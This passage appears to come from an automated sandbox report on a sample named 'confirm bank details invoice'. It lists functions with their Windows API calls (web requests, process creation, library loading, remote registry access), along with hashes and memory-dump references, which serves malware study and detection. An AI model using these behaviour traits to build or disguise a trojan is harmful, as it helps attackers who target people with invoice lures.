                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: BuffCharLower
                    • String ID: cdecl$none$stdcall$winapi
                    • API String ID: 2358735015-567219261
                    • Opcode ID: a7433f82e5e13e282bc8b2fe37a85afca4d112f324657f2d270a0829609bf61d
                    • Instruction ID: 462736ce1174a0a3ec3ff061064f8ed97f2dbcc2f8457ec8ebacd2124e965d80
                    • Opcode Fuzzy Hash: a7433f82e5e13e282bc8b2fe37a85afca4d112f324657f2d270a0829609bf61d
                    • Instruction Fuzzy Hash: C531BF30900116ABCF00EF65C851AEEB3B4FF41314F00862FA826A73D1DB79E916CB84
                    Function 004AB80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004AB88E
                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 004AB8A1
                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 004AB8D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: ComboBox$ListBox
                    • API String ID: 3850602802-1403004172
                    • Opcode ID: bc79d8c25a5d08ae69fab383bed26b4c9aac7e80adb48940c277ee6999ba9241
                    • Instruction ID: ddaefc293c5da5d6ce6f4955095d896a131200f1f943d2614a8a2c5a731ab10c
                    • Opcode Fuzzy Hash: bc79d8c25a5d08ae69fab383bed26b4c9aac7e80adb48940c277ee6999ba9241
                    • Instruction Fuzzy Hash: 2521D275900104BFDB04ABB9D8869FF7779EF16354B10812EF015A21E2DB6C5D0A97A8
                    Function 004C43E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004C4401
                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004C4427
                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004C4457
                    • InternetCloseHandle.WININET(00000000), ref: 004C449E
                      • Part of subcall function 004C5052: GetLastError.KERNEL32(?,?,004C43CC,00000000,00000000,00000001), ref: 004C5067
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                    • String ID:
                    • API String ID: 1951874230-3916222277
                    • Opcode ID: e46838e1bfd4ecbc62008998bac7e0474959b2e2fcb7462c53ca08b73a865657
                    • Instruction ID: 54806f5f8138f7a97ac38e57ef09c3ddf96e81d1cb3f76a6ff3ff9fd46162852
                    • Opcode Fuzzy Hash: e46838e1bfd4ecbc62008998bac7e0474959b2e2fcb7462c53ca08b73a865657
                    • Instruction Fuzzy Hash: E421D0B9500208BFE751AF95CD90FBFBAECEB88758F20802FF105D6240DA689D059779
                    Function 004D90E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0048D1BA
                      • Part of subcall function 0048D17C: GetStockObject.GDI32(00000011), ref: 0048D1CE
                      • Part of subcall function 0048D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0048D1D8
                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 004D915C
                    • LoadLibraryW.KERNEL32(?), ref: 004D9163
                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 004D9178
                    • DestroyWindow.USER32(?), ref: 004D9180
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                    • String ID: SysAnimate32
                    • API String ID: 4146253029-1011021900
                    • Opcode ID: 746bce379e1d9885926d73d04321a30ee161b205ee825fe8d20f49bc7b1c10f4
                    • Instruction ID: 85ac623641da5fdf544cff4427cbbad1f9a85c63aa8a32124fd93437dd521765
                    • Opcode Fuzzy Hash: 746bce379e1d9885926d73d04321a30ee161b205ee825fe8d20f49bc7b1c10f4
                    • Instruction Fuzzy Hash: 86218E71600206BBFF104E649C99EBF37A9EF99364F10461BF954D2390C735DC52A768
                    Function 004B9568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(0000000C), ref: 004B9588
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004B95B9
                    • GetStdHandle.KERNEL32(0000000C), ref: 004B95CB
                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 004B9605
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: fe376be8ff009bc99bbda883ab4cea9967b99a80d0709d7c04693393d714fe01
                    • Instruction ID: a04f5546eceec1191cc5ac861e5c5fdf029fc8372442e70159c554b2081f1da5
                    • Opcode Fuzzy Hash: fe376be8ff009bc99bbda883ab4cea9967b99a80d0709d7c04693393d714fe01
                    • Instruction Fuzzy Hash: 4F21B071640205ABDB219F25DC04ADA7BF8AF54324F204A2AFEA1D72D0D774DD51CB78
                    Function 004B9634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 004B9653
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004B9683
                    • GetStdHandle.KERNEL32(000000F6), ref: 004B9694
                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 004B96CE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: 29b709f75cdc6d203c800073e1ea9759b8c3c94de989b21c03aeae998804d486
                    • Instruction ID: 8b10aeed1160363ae1939e16cda86ed004aeb21d934b0aaecc92842f03429f9d
                    • Opcode Fuzzy Hash: 29b709f75cdc6d203c800073e1ea9759b8c3c94de989b21c03aeae998804d486
                    • Instruction Fuzzy Hash: 6921AF716002059BDB209F699C05EEA77E8AF55724F200A1AFAA1E73D0E774DC51CB78
                    Function 004BDAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 004BDB0A
                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 004BDB5E
                    • __swprintf.LIBCMT ref: 004BDB77
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0050DC00), ref: 004BDBB5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ErrorMode$InformationVolume__swprintf
                    • String ID: %lu
                    • API String ID: 3164766367-685833217
                    • Opcode ID: 9b27aa295fc96005be98e8ad8470a952e4922a9546cf614c906861a312def31c
                    • Instruction ID: 00f22d4bf91c261ae44a0769f92c36f5b8b39473d6eab9d3b57f29da11a1aef2
                    • Opcode Fuzzy Hash: 9b27aa295fc96005be98e8ad8470a952e4922a9546cf614c906861a312def31c
                    • Instruction Fuzzy Hash: 71217135A00108AFCB10EFA5D985DEEBBB9EF49704B0040AEF509E7251DB74EA01CB65
                    Function 004AC9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004AC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004AC84A
                      • Part of subcall function 004AC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 004AC85D
                      • Part of subcall function 004AC82D: GetCurrentThreadId.KERNEL32 ref: 004AC864
                      • Part of subcall function 004AC82D: AttachThreadInput.USER32(00000000), ref: 004AC86B
                    • GetFocus.USER32 ref: 004ACA05
                      • Part of subcall function 004AC876: GetParent.USER32(?), ref: 004AC884
                    • GetClassNameW.USER32(?,?,00000100), ref: 004ACA4E
                    • EnumChildWindows.USER32(?,004ACAC4), ref: 004ACA76
                    • __swprintf.LIBCMT ref: 004ACA90
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                    • String ID: %s%d
                    • API String ID: 3187004680-1110647743
                    • Opcode ID: b81035153ca7e189fe3f3084384c65947541b97ff12326f221af0c0a84817742
                    • Instruction ID: 26100c155aada57efdee0b7604ebaeeece32f4d8e49ae5f99fb15d9b450f4f36
                    • Opcode Fuzzy Hash: b81035153ca7e189fe3f3084384c65947541b97ff12326f221af0c0a84817742
                    • Instruction Fuzzy Hash: AD11A5759002057BDB01BF918CC5FF93769AF66708F00806BF918AA182CB789945DB78
                    Function 00497A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __lock.LIBCMT ref: 00497AD8
                      • Part of subcall function 00497CF4: __mtinitlocknum.LIBCMT ref: 00497D06
                      • Part of subcall function 00497CF4: EnterCriticalSection.KERNEL32(00000000,?,00497ADD,0000000D), ref: 00497D1F
                    • InterlockedIncrement.KERNEL32(?), ref: 00497AE5
                    • __lock.LIBCMT ref: 00497AF9
                    • ___addlocaleref.LIBCMT ref: 00497B17
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                    • String ID: `O
                    • API String ID: 1687444384-2819024103
                    • Opcode ID: daf3b3e9e47b77b864a86cb70c5ca98e02502b20de86ea7cc61df707b1d4957a
                    • Instruction ID: 34255a55a3c7bc7eb4778d81b514b156397985d8b84f8d7e5545d594d3f3f468
                    • Opcode Fuzzy Hash: daf3b3e9e47b77b864a86cb70c5ca98e02502b20de86ea7cc61df707b1d4957a
                    • Instruction Fuzzy Hash: 1E016D71445B01EFDB20DF76D90574ABBF0AF50329F20891FA49A976A0CB78A644CB09
                    Function 004DE32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 004DE33D
                    • _memset.LIBCMT ref: 004DE34C
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00533D00,00533D44), ref: 004DE37B
                    • CloseHandle.KERNEL32 ref: 004DE38D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _memset$CloseCreateHandleProcess
                    • String ID: D=S
                    • API String ID: 3277943733-274248958
                    • Opcode ID: 06e3afa786863cf176ffb7622d8adf733f96201840cd03bf920c837b85207032
                    • Instruction ID: 699265e3c6e4ab12ba1b7ef427293cfbe10fe04446bf3441eb78ce31396b007e
                    • Opcode Fuzzy Hash: 06e3afa786863cf176ffb7622d8adf733f96201840cd03bf920c837b85207032
                    • Instruction Fuzzy Hash: 80F05EF1640304BEE7102B65AC45F7B7E9CEB15794F004832BF08DA2A2D7799E1096A8
                    Function 004D1945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                    Download Yara Rule
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004D19F3
                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 004D1A26
                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 004D1B49
                    • CloseHandle.KERNEL32(?), ref: 004D1BBF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                    • String ID:
                    • API String ID: 2364364464-0
                    • Opcode ID: 21fd1b8afbde27ddd212a0ea83afb37427cd0a9e2a74a13839e1d4576a682a35
                    • Instruction ID: 2902f1e00ac91fe9df1238bb34695716460fd67b4905f8f9d31ad060c0d92265
                    • Opcode Fuzzy Hash: 21fd1b8afbde27ddd212a0ea83afb37427cd0a9e2a74a13839e1d4576a682a35
                    • Instruction Fuzzy Hash: B981A670600200ABDF11EF65C896BAEBBE5EF04714F14845BFD05AF392D7B8A941CB94
                    Function 004DE062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 004DE1D5
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 004DE20D
                    • IsDlgButtonChecked.USER32(?,00000001), ref: 004DE248
                    • GetWindowLongW.USER32(?,000000EC), ref: 004DE269
                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 004DE281
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$ButtonCheckedLongWindow
                    • String ID:
                    • API String ID: 3188977179-0
                    • Opcode ID: 129b2b1221bd62fde83213cd7a3d1c29053b2f6221c3c07307ac1a2f201cfebc
                    • Instruction ID: 6e3a95f8035de77b6f85ff4e43f7c7448cf2e2bae36bdadc35366c6ba6865b68
                    • Opcode Fuzzy Hash: 129b2b1221bd62fde83213cd7a3d1c29053b2f6221c3c07307ac1a2f201cfebc
                    • Instruction Fuzzy Hash: B861A134B00604AFDB21EF5AC865FAF77BAAB4A300F04405BE8599F391C778A941CB19
                    Function 004B1C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 004B1CB4
                    • VariantClear.OLEAUT32(00000013), ref: 004B1D26
                    • VariantClear.OLEAUT32(00000000), ref: 004B1D81
                    • VariantClear.OLEAUT32(?), ref: 004B1DF8
                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 004B1E26
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Variant$Clear$ChangeInitType
                    • String ID:
                    • API String ID: 4136290138-0
                    • Opcode ID: 4ae04b0a3c729c7b1fd01f6bbca35b9fce69e7f5bcabbeb61960ea916044b500
                    • Instruction ID: 09ab6842ce2312dd5edb8695c4817943b90ed4f3c3155249989f1a89d79984cf
                    • Opcode Fuzzy Hash: 4ae04b0a3c729c7b1fd01f6bbca35b9fce69e7f5bcabbeb61960ea916044b500
                    • Instruction Fuzzy Hash: 025169B5A00209EFCB14CF58C890AAAB7B9FF4D314B15855AED49DB310E334EA11CFA4
                    Function 004D0688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
                      • Part of subcall function 0047936C: __itow.LIBCMT ref: 004793DF
                    • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 004D06EE
                    • GetProcAddress.KERNEL32(00000000,?), ref: 004D077D
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004D079B
                    • GetProcAddress.KERNEL32(00000000,?), ref: 004D07E1
                    • FreeLibrary.KERNEL32(00000000,00000004), ref: 004D07FB
                      • Part of subcall function 0048E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004BA574,?,?,00000000,00000008), ref: 0048E675
                      • Part of subcall function 0048E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,004BA574,?,?,00000000,00000008), ref: 0048E699
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                    • String ID:
                    • API String ID: 327935632-0
                    • Opcode ID: bc02821f1ac9acba139e8e8ce063a6eb71944bb72b672493d4b9d6df4734b272
                    • Instruction ID: 69ce74d2cd980d2a995d5ebceebb6f74148a5275801e4aa312f8dbcf1ba700ef
                    • Opcode Fuzzy Hash: bc02821f1ac9acba139e8e8ce063a6eb71944bb72b672493d4b9d6df4734b272
                    • Instruction Fuzzy Hash: 19515D75A00205DFCB00EFA9C491AADB7B5BF19314F04C06BE919AB352DB38ED42CB59
                    Function 004D2E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004D3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004D2BB5,?,?), ref: 004D3C1D
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004D2EEF
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004D2F2E
                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 004D2F75
                    • RegCloseKey.ADVAPI32(?,?), ref: 004D2FA1
                    • RegCloseKey.ADVAPI32(00000000), ref: 004D2FAE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                    • String ID:
                    • API String ID: 3740051246-0
                    • Opcode ID: ab025fe518c3e74df0441c8ef2a8c271ef02e7cd1e9020066f90d0264b8c20dc
                    • Instruction ID: 0577e4b84bd58ce9e22bd40075c9efb5c3c7b0652cf3ad7829fc40d027c0a3e3
                    • Opcode Fuzzy Hash: ab025fe518c3e74df0441c8ef2a8c271ef02e7cd1e9020066f90d0264b8c20dc
                    • Instruction Fuzzy Hash: 35517B31608204AFC704EF55C991EABB7F9FF88308F00882EF59997291DB74E905DB5A
                    Function 004DCCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 02ce68b1bebe9bb8c4641e0325063e8c1094bcf5e5db1952739b4c3b1e1808be
                    • Instruction ID: ff9af4704bf4afc9844b972a349e5d4a2dae6b0ca025da1ed8fbb901aa2cc09a
                    • Opcode Fuzzy Hash: 02ce68b1bebe9bb8c4641e0325063e8c1094bcf5e5db1952739b4c3b1e1808be
